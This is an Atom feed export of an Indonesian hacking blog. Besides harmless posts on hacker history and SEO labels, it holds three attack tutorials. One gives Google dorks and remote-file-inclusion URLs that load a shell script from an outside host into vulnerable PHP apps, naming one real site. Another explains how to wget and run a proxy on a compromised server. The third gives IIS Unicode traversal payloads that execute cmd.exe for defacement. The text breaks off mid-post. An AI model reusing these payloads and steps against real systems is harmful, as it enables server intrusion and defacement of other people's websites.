<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-4057913628507130739</id><updated>2011-04-21T14:40:01.408-07:00</updated><category term='SQL - INJECTION'/><category term='Badkiddies'/><category term='White Hat VS Black Hat'/><category term='Deface'/><category term='Proxy'/><category term='Apa Arti Hacker ?'/><title type='text'>..:: Hack1ng 1n Th3 w0rLd ::..</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://stupidsignal.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4057913628507130739/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://stupidsignal.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>STupID SigNaL</name><uri>http://www.blogger.com/profile/02211733191185843456</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_8X-oMz8K51A/Sbvne1oqRZI/AAAAAAAAAAM/ZBo0MDU82jM/S220/Farel.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>9</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-4057913628507130739.post-1170321883054323180</id><published>2009-03-28T16:43:00.000-07:00</published><updated>2009-04-02T14:31:36.450-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Badkiddies'/><title type='text'>hufh...</title><content type='html'>&lt;span style="font-weight: bold;"&gt;Kenapa masi ada saja WEBSITE Indonesia yang security nya sangad buruk..&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;apa kata DUNIA.. ???&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;kapan WEBSITE Indonesia maju ???&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Kenapa masi bisa di tembus &lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;oleh seorang HACKER ??&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;duuh jadii prihatin liad web - web Indonesia &lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;di Deface&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&gt;.&lt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4057913628507130739-1170321883054323180?l=stupidsignal.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://stupidsignal.blogspot.com/feeds/1170321883054323180/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4057913628507130739&amp;postID=1170321883054323180' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4057913628507130739/posts/default/1170321883054323180'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4057913628507130739/posts/default/1170321883054323180'/><link rel='alternate' type='text/html' href='http://stupidsignal.blogspot.com/2009/03/hufh.html' title='hufh...'/><author><name>STupID SigNaL</name><uri>http://www.blogger.com/profile/02211733191185843456</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_8X-oMz8K51A/Sbvne1oqRZI/AAAAAAAAAAM/ZBo0MDU82jM/S220/Farel.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4057913628507130739.post-3682656036306777616</id><published>2009-03-28T16:40:00.000-07:00</published><updated>2009-03-28T16:43:06.792-07:00</updated><title type='text'></title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://img5.imageshack.us/img5/5596/defacep.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 568px; height: 426px;" src="http://img5.imageshack.us/img5/5596/defacep.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;Salah Satu Kelalaian WEBSITE INDONESIA..?!&lt;br /&gt;&lt;br /&gt;..::WHY::..&lt;br /&gt;&lt;br /&gt;!!..Please Repire Your System..!!&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4057913628507130739-3682656036306777616?l=stupidsignal.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://stupidsignal.blogspot.com/feeds/3682656036306777616/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4057913628507130739&amp;postID=3682656036306777616' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4057913628507130739/posts/default/3682656036306777616'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4057913628507130739/posts/default/3682656036306777616'/><link rel='alternate' type='text/html' href='http://stupidsignal.blogspot.com/2009/03/salah-satu-kelalaian-website-indonesia_2640.html' title=''/><author><name>STupID SigNaL</name><uri>http://www.blogger.com/profile/02211733191185843456</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_8X-oMz8K51A/Sbvne1oqRZI/AAAAAAAAAAM/ZBo0MDU82jM/S220/Farel.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4057913628507130739.post-7040954013052555168</id><published>2009-03-28T03:39:00.000-07:00</published><updated>2009-03-28T03:40:32.302-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Apa Arti Hacker ?'/><title type='text'>Arti Hacker dan Cracker</title><content type='html'>&lt;span class="Apple-style-span" style="font-family: verdana; font-size: 16px; -webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; "&gt;Hacker muncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka beroperasi dengan sejumlah komputer mainframe. Kata hacker pertama kali muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik dari yang telah dirancang bersama. Kemudian pada tahun 1983, analogi hacker semakin berkembang untuk menyebut seseorang yang memiliki obsesi untuk memahami dan menguasai sistem komputer. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee AS. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Salah seorang dari antara pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.&lt;br /&gt;&lt;br /&gt;Kemudian pada perkembangan selanjutnya muncul kelompok lain yang menyebut-nyebut diri hacker, padahal bukan. Mereka ini (terutama para pria dewasa) yang mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Hacker sejati menyebut orang-orang ini 'cracker' dan tidak suka bergaul dengan mereka. Hacker sejati memandang cracker sebagai orang malas, tidak&lt;br /&gt;bertanggung jawab, dan tidak terlalu cerdas. Hacker sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi hacker.&lt;br /&gt;&lt;br /&gt;Para hacker mengadakan pertemuan setiap setahun sekali yaitu diadakan setiap pertengahan bulan Juli di Las Vegas. Ajang pertemuan hacker terbesar di dunia tersebut dinamakan Def Con. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktivitas hacking.&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4057913628507130739-7040954013052555168?l=stupidsignal.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://stupidsignal.blogspot.com/feeds/7040954013052555168/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4057913628507130739&amp;postID=7040954013052555168' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4057913628507130739/posts/default/7040954013052555168'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4057913628507130739/posts/default/7040954013052555168'/><link rel='alternate' type='text/html' href='http://stupidsignal.blogspot.com/2009/03/arti-hacker-dan-cracker.html' title='Arti Hacker dan Cracker'/><author><name>STupID SigNaL</name><uri>http://www.blogger.com/profile/02211733191185843456</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_8X-oMz8K51A/Sbvne1oqRZI/AAAAAAAAAAM/ZBo0MDU82jM/S220/Farel.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4057913628507130739.post-1907483653170299390</id><published>2009-03-28T03:33:00.000-07:00</published><updated>2009-03-28T03:35:03.232-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='White Hat VS Black Hat'/><title type='text'>White Hat VS Black Hat</title><content type='html'>&lt;span class="Apple-style-span" style="color: rgb(90, 90, 75); font-family: 'Lucida Grande'; font-size: 14px; "&gt;&lt;p&gt;Let’s face it: as long as there is a logical-sounding, convenient (useful) label floating around, it will get used and mis-used. That is the story of “Black Hat SEO” and “White Hat SEO”. They are poor quality labels, poorly-defined (in practice), yet so easily “understood” and so convenient that they persist… year after year.&lt;/p&gt;&lt;p&gt;Personally I believe that these labels are good for Google, and bad for SEO practitioners. I believe that by labeling SEO as “black” or “white”, Google gains an opportunity to influence the popular perception of SEO in it’s favor, where otherwise it would not have such an opportunity. Of course Google has used this to its advantage many times (such as the times it has cautioned web site owners not to trust SEOs, because they may employ Black Hat tactics…F.U.D.). As I have said before, there is only one color of SEO worthy of effort, and that’s &lt;a title="Green SEO" href="http://www.johnon.com/153/green-seo.html" style="color: rgb(153, 170, 221); text-decoration: none; "&gt;Green SEO&lt;/a&gt;.&lt;br /&gt;So while it is unfortunate that we have to accept these labels, we do have to accept them because our clients think they understand them. Therefore, it is also essential that we properly define them.&lt;/p&gt;&lt;p&gt;That’s really quite easy to do, especially when you start with the definition of “Black Hat” SEO:&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Black Hat &lt;/strong&gt;: techniques or tactics which have been defined by Google as in violation of the Google “Quality Guidelines” (see “&lt;a href="http://www.google.com/support/webmasters/bin/answer.py?answer=35769" style="color: rgb(153, 170, 221); text-decoration: none; "&gt;Quality Guidelines, which outline some of the illicit practices that may lead to a site being removed entirely from the Google index”&lt;/a&gt;) . The Black Hat label applies to those methods specifically mentioned n the “Guidelines”, other methods and/or tactics or circumstances mentioned by&lt;a href="http://www.mattcutts.com/blog/" style="color: rgb(153, 170, 221); text-decoration: none; "&gt;Matt Cutts in his blog&lt;/a&gt;, in Matt’s comments on others’ blogs, or just about anywhere anyone from Google says anything that strongly suggests Google took action against a site for some specific reason. Black Hat SEOs know what they are doing is defined as BAD, and do it anyway for specific reasons (not usually including “get banned”). I like to think of Black Hat SEOs as opportunists. They see an opportunity to gain, and take it, managing the associated risk. Please don’t confuse ignorant SEOs with Black Hat SEOs… the ignorant ones are those who execute on Black Hat (evil) tactics without managing the risks (either out of ignorance or folly doesn’t matter to me here).&lt;/p&gt;&lt;p&gt;&lt;strong&gt;White Hat&lt;/strong&gt;: techniques or tactics which can be defended as NOT being contrary to the spirit of Google’s expressed quality desires, by citing Google’s own published guidelines, Matt Cutts’ blog posts, or comments posted in other places, or just about any other Google communication. I like to refer to White Hat SEOs as “conservatives” of the SEO world… where things are viewed as BLACK or WHITE (GOOD or BAD), and the letter of the Google god is taken verbatim as TRUTH. Yes, there is a bit of a timeline problem with that approach (if Matt said it was bad in 2002, is it still bad?) but that’s just the tip of the White Hat iceburg.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Grey Hat&lt;/strong&gt; (or &lt;a href="http://www.wolf-howl.com/" style="color: rgb(153, 170, 221); text-decoration: none; "&gt;Gray&lt;/a&gt; Hat): Since the color gray is between black and white, logically Grey Hat SEO sounds like a label for the middle ground. But it’s not. Because White is pure white and grey is a shade of black, we have confusion. Some say Grey Hat is NOT White Hat and is just a shade of Black Hat. So let’s step away from the coor wheel and define Grey Hat as the practice of tactics/techniques which remain ill-defined by all that published material coming out of Google, and for which reasonable people (not White Hat SEOs, mind you, but “reasonable people”) could disagree on how the tactics support or contrast with the “spirit” of Google’s published guidelines.&lt;/p&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4057913628507130739-1907483653170299390?l=stupidsignal.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://stupidsignal.blogspot.com/feeds/1907483653170299390/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4057913628507130739&amp;postID=1907483653170299390' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4057913628507130739/posts/default/1907483653170299390'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4057913628507130739/posts/default/1907483653170299390'/><link rel='alternate' type='text/html' href='http://stupidsignal.blogspot.com/2009/03/white-hat-vs-black-hat.html' title='White Hat VS Black Hat'/><author><name>STupID SigNaL</name><uri>http://www.blogger.com/profile/02211733191185843456</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_8X-oMz8K51A/Sbvne1oqRZI/AAAAAAAAAAM/ZBo0MDU82jM/S220/Farel.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4057913628507130739.post-5256744263831195688</id><published>2009-03-28T03:13:00.000-07:00</published><updated>2009-03-28T03:20:14.807-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Badkiddies'/><title type='text'>In Hom3 Badkiddies</title><content type='html'>hufh,,,&lt;br /&gt;&lt;br /&gt;malem - malem kerumah nya si bad,,!?&lt;br /&gt;&lt;br /&gt;&gt;.&lt;&lt;br /&gt;&lt;br /&gt;huh..&lt;br /&gt;&lt;br /&gt;sudah jauh, gelap, ngeri, di desa lagiii :p&lt;br /&gt;&lt;br /&gt;heheeheee..&lt;br /&gt;&lt;br /&gt;walaupun gelap dan sebagi na..&lt;br /&gt;&lt;br /&gt;tapi lumayan jugag , bisa internet gratis pake MAC ....  :P&lt;br /&gt;&lt;br /&gt;banyak kejadian janggal saat malam harii..   &lt;--- ehM.. hayO ada apaa yaa .. :P&lt;br /&gt;wkwkkwkwkwkw.... :P&lt;br /&gt;&lt;br /&gt;Thx f0r : Badkiddies - Om Bernand - Pak.Hanjian and Bonsterfly.. :P&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4057913628507130739-5256744263831195688?l=stupidsignal.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://stupidsignal.blogspot.com/feeds/5256744263831195688/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4057913628507130739&amp;postID=5256744263831195688' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4057913628507130739/posts/default/5256744263831195688'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4057913628507130739/posts/default/5256744263831195688'/><link rel='alternate' type='text/html' href='http://stupidsignal.blogspot.com/2009/03/in-hom3-badkiddies.html' title='In Hom3 Badkiddies'/><author><name>STupID SigNaL</name><uri>http://www.blogger.com/profile/02211733191185843456</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_8X-oMz8K51A/Sbvne1oqRZI/AAAAAAAAAAM/ZBo0MDU82jM/S220/Farel.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4057913628507130739.post-2307268297067862453</id><published>2009-03-27T13:55:00.000-07:00</published><updated>2009-03-27T13:56:36.646-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Deface'/><title type='text'>..:: Deface ::..</title><content type='html'>&lt;span class="postbody"&gt;aya ingin berbagi pengalaman tentang nge-Deface dan berbagai command command yang bermanfaat bagi kita didalam nge-Deface..&lt;br /&gt;&lt;br /&gt;Oke deh ga perlu berpanjang lebar apa itu DEFACE.... wong kita cuman mempelajari bagaimana caranya masuk ke dalam web seseorang yang didalamnya terdapat BUG atau kesalahan kesalahan yang terdapat pada Script atau Link nya..&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..&lt;br /&gt;&lt;br /&gt;cd namadirectory = Melihat Suatu directory&lt;br /&gt;ls -al = Melihat Suatu Directory Lebih Dalam lagi&lt;br /&gt;fined = Mengecek Directory directory&lt;br /&gt;cat = Membaca Suatu Berkas&lt;br /&gt;wget = MengUpload suatu Files&lt;br /&gt;tar -zxvf = MengExtraxt suatu files yang berbentuk&lt;br /&gt;tgz&lt;br /&gt;pwd = Mengetahui Di Directory mana Kita Berada&lt;br /&gt;uname -a = Keberadaan Path berada&lt;br /&gt;w = Mengetahui Siapa Saja yang telah menggunakan Shell.&lt;br /&gt;&lt;br /&gt;Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :&lt;br /&gt;&lt;br /&gt;- Oneadmin&lt;br /&gt;&lt;br /&gt;Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:.net&lt;br /&gt;nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=&lt;br /&gt;&lt;br /&gt;Contoh :&lt;br /&gt;http://target.com/oneadmin/config.php?path[docroot]=http://geocities.com/hackerbalinese/hackbalinese.txt?&amp;amp;cmd=uname -a;cd;pwd;ls –al&lt;br /&gt;&lt;br /&gt;- PnPhpBB2&lt;br /&gt;&lt;br /&gt;Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki...&lt;br /&gt;&lt;br /&gt;nah sekarang saya kasi contoh pathnya … http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=&lt;br /&gt;&lt;br /&gt;Contoh :&lt;br /&gt;http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/hackerbalinese/hackbalinese.txt?&amp;amp;cmd=uname%20-a;cd;pwd&lt;br /&gt;&lt;br /&gt;- Support Ticket&lt;br /&gt;&lt;br /&gt;Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki...&lt;br /&gt;nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&amp;amp;include_dir=&lt;br /&gt;&lt;br /&gt;Contoh : … http://target.com/include/main.php?config[search_disp]=true&amp;amp;include_dir=http://geocities.com/hackerbalinese/hackbalinese.txt?&amp;amp;cmd=uname -a;cd;pwd;ls –al&lt;br /&gt;&lt;br /&gt;Hehehe Lumayan banyak kan ? Nah selamat mencobanya..&lt;br /&gt;Neh aku kasi beberapa web yang telah berhasil saya Deface.. &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4057913628507130739-2307268297067862453?l=stupidsignal.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://stupidsignal.blogspot.com/feeds/2307268297067862453/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4057913628507130739&amp;postID=2307268297067862453' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4057913628507130739/posts/default/2307268297067862453'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4057913628507130739/posts/default/2307268297067862453'/><link rel='alternate' type='text/html' href='http://stupidsignal.blogspot.com/2009/03/deface.html' title='..:: Deface ::..'/><author><name>STupID SigNaL</name><uri>http://www.blogger.com/profile/02211733191185843456</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_8X-oMz8K51A/Sbvne1oqRZI/AAAAAAAAAAM/ZBo0MDU82jM/S220/Farel.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4057913628507130739.post-6412271293551131687</id><published>2009-03-17T04:56:00.001-07:00</published><updated>2009-03-17T04:57:05.608-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Proxy'/><title type='text'>Membuat Proxy Dari Shell</title><content type='html'>&lt;p&gt;kamu punya shell..??? tapi bingung mo diapain?? aku punya jawabannya… ayo kita buat proxy sendiri menggunakan shell hasil inject-an kita… hehhee…&lt;/p&gt; &lt;p&gt;ok daripada banyak bacot.. kita mulai tutorialnya…&lt;/p&gt; &lt;p&gt;INGAT… ini hanya buat kamu yang dah punya shell hasil inject-an, dan shell itu menggunakan LINUX sebagai Operating F*ckin system-nya&lt;span id="more-4"&gt;&lt;/span&gt;&lt;/p&gt; &lt;p&gt;1. cari folder yang permision 777 (drwxrrwxrwx) dengan menggunakan command&lt;/p&gt; &lt;p&gt;“&lt;em&gt;&lt;strong&gt;find / - tipe d -perm 777&lt;/strong&gt;&lt;/em&gt;”&lt;/p&gt; &lt;p&gt;kalo dah ketemu… masuk ke folder tersebut…&lt;/p&gt; &lt;p&gt;2. download file &lt;a title="proxy" href="http://h1.ripway.com/xshadow/proxy.tgz" target="_blank"&gt;proxy.tgz&lt;/a&gt; ini dengan menggunakan command “&lt;em&gt;&lt;strong&gt;wget http://h1.ripway.com/xshadow/proxy.tgz&lt;/strong&gt;&lt;/em&gt;” atau&lt;/p&gt; &lt;p&gt;“&lt;em&gt;&lt;strong&gt;lwp-download http://h1.ripway.com/xshadow/proxy.tgz&lt;/strong&gt;&lt;/em&gt;“.&lt;/p&gt; &lt;p&gt;Kalo masih tetep gak bisa.. dengan terpaksa kamu harus dunlut file proxy.tgz trus upload ke shell inject-an kamu tadi… kalo dah ter download atau upload file proxy.tgz-nya… kamu boleh masuk ke no.3&lt;/p&gt; &lt;p&gt;3. extra’ file proxy dengan menggunakan command “&lt;em&gt;&lt;strong&gt;tar -zvxf proxy.tgz&lt;/strong&gt;&lt;/em&gt;” nanti akan menghasilkan folder “pro” pada folder yang 777 tadi…&lt;/p&gt; &lt;p&gt;4. masuk ke folder “pro” dengan menggunakan command “&lt;em&gt;&lt;strong&gt;cd pro&lt;/strong&gt;&lt;/em&gt;”&lt;/p&gt; &lt;p&gt;5. kemudian execute menggunakan command “&lt;em&gt;&lt;strong&gt;./xh -s “/usr/local/apache/bin/httpd -DSSL””&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt; &lt;p&gt;6. execute sekali lagi menggunakan command “&lt;em&gt;&lt;strong&gt;./prox -a -d -p1810&lt;/strong&gt;&lt;/em&gt;” dimana angka pada -p1810 itu digunakan sebagai port… terserah kamu buat port brapa.. yang penting jangan menggunakan kepala angka 0 ex: 0932 atau apalah.. kalo bisa kamu lihat hasil nomor hari ini di www.totobet.net hari ini… heuheuehue&lt;/p&gt; &lt;p&gt;7 sukses&lt;/p&gt; &lt;p&gt;nah untuk menggunakan proxy tersebut… dimana dns website itu sebagai nomor proxy… dan nomor togel yang di -p1810 ituitu adalah nomor port…&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4057913628507130739-6412271293551131687?l=stupidsignal.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://stupidsignal.blogspot.com/feeds/6412271293551131687/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4057913628507130739&amp;postID=6412271293551131687' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4057913628507130739/posts/default/6412271293551131687'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4057913628507130739/posts/default/6412271293551131687'/><link rel='alternate' type='text/html' href='http://stupidsignal.blogspot.com/2009/03/membuat-proxy-dari-shell.html' title='Membuat Proxy Dari Shell'/><author><name>STupID SigNaL</name><uri>http://www.blogger.com/profile/02211733191185843456</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_8X-oMz8K51A/Sbvne1oqRZI/AAAAAAAAAAM/ZBo0MDU82jM/S220/Farel.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4057913628507130739.post-4623709909160177816</id><published>2009-03-14T10:26:00.000-07:00</published><updated>2009-03-14T10:29:26.735-07:00</updated><title type='text'>DEFACE FROM CMD.EXE</title><content type='html'>1. Kita Harus menentukan WebSite Target/ Sasaran Kita : www.target.loe contoh--&gt;&gt; www.target.com&lt;br /&gt;&lt;br /&gt;2. Login&lt;br /&gt;Ini Merupakan Directory yang Ada Di Web Site Tersebut&lt;br /&gt;Directory Ini Di Configurasi Dengan Script tertentu Supayafile dalam Web tersebut Berhubungan Jika terjadi bug pada script nya maka kita bisa bembus web ini&lt;br /&gt;ada beberapa contoh login diantaranya :&lt;br /&gt;a)/_vti_bin&lt;br /&gt;b)/_vti_cnf&lt;br /&gt;c)/cgi-bin&lt;br /&gt;d)/scripts&lt;br /&gt;e)/msadc&lt;br /&gt;&lt;br /&gt;3. Unicode ---&gt;&gt; merupakan code yang dapat membaca script configurasi website tersebut code ini yang dapat membaca bug cgi nya&lt;br /&gt;hasil codingnya seperti bisa 1-3 x pengulangan tergantung target yang akan kita hackinng&lt;br /&gt;a) ..%c1%1c..&lt;br /&gt;b) ..%c0%9v..&lt;br /&gt;c) ..%c0%af..&lt;br /&gt;d) ..%c0%qf..&lt;br /&gt;e) ..%c1%8s..&lt;br /&gt;f) ..%e0%80%af..&lt;br /&gt;g) ..%c1%9c..&lt;br /&gt;h) ..%c1%pc..&lt;br /&gt;&lt;br /&gt;4. OS target --&gt;&gt;ini Menyatakan Sertificate Web Os kita WinNT dan Win98&lt;br /&gt;0xB5 ISO 8859-1&lt;br /&gt;0xC5 ISO 8859-1&lt;br /&gt;0xEA CP437&lt;br /&gt;0x2140 JIS X 0208&lt;br /&gt;0x22 ISO 8859-1&lt;br /&gt;&lt;br /&gt;5. Cara Kerja&lt;br /&gt;Secara Garis Besar deface Ini dilakukan Dengan tiga Cara yaitu :&lt;br /&gt;A.) Deface WebSite Perintah Echo&lt;br /&gt;&lt;br /&gt;a.)Secara umum : http://target/login/unicode/os/system/c+dir atau http://www.target.com/login/unicode/os/system/c+dir&lt;br /&gt;&lt;br /&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:&lt;br /&gt;&lt;br /&gt;Jika terdapat Bug Maka Pada title brower kita ada kata CGi Error Maka Kita telah menembus web site itu&lt;br /&gt;Maka Yang terlihat pada brower kita adalah list yang berupa isi hardisk webserver tersebut sama halnya&lt;br /&gt;command dir yang kita lakukan di Dos Prompt&lt;br /&gt;Directory of c:&lt;br /&gt;10/05/2001 19:56 Programs Files&lt;br /&gt;10/05/2001 19:56 Inetpub&lt;br /&gt;08/05/2001 10:23 230 cmd.exe&lt;br /&gt;24/04/2001 04:33 4.620 1home.htm&lt;br /&gt;05/10/2000 12:40 668 about.htm&lt;br /&gt;10/05/2001 19:54 AboutUs&lt;br /&gt;11/05/2001 10:28 131 about_us.htm&lt;br /&gt;28/10/2000 14:49 4.911 about_us.old.htm&lt;br /&gt;&lt;br /&gt;b.)Setelah berhasil liat List Hardisk Kita Harus cari Path_Translade web nya dengan menggunakan command /c+dir+c: di ubah menjadi /c+set&lt;br /&gt;&lt;br /&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: menjadi http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+set /c+dir+c: di ubah menjadi /c+set&lt;br /&gt;&lt;br /&gt;maka Akan keluar CGI error yang isinya menyatakan Configurasi Batch Sytem WebServer tersebut. Keluar Macam - Macam, Yang Perlu dilihat cuma:&lt;br /&gt;Path_Translated=d:\inetpub\wwwroot&lt;br /&gt;&lt;br /&gt;c.) Langkah Selanjutnya Adalah Copy file cmd.exe dengan nama baru cmd1.exe atau nama anda contoh Jangkrik.exe dengan mengganti&lt;br /&gt;&lt;br /&gt;/c+dir+c: menjadi /c+copy+c:&lt;br 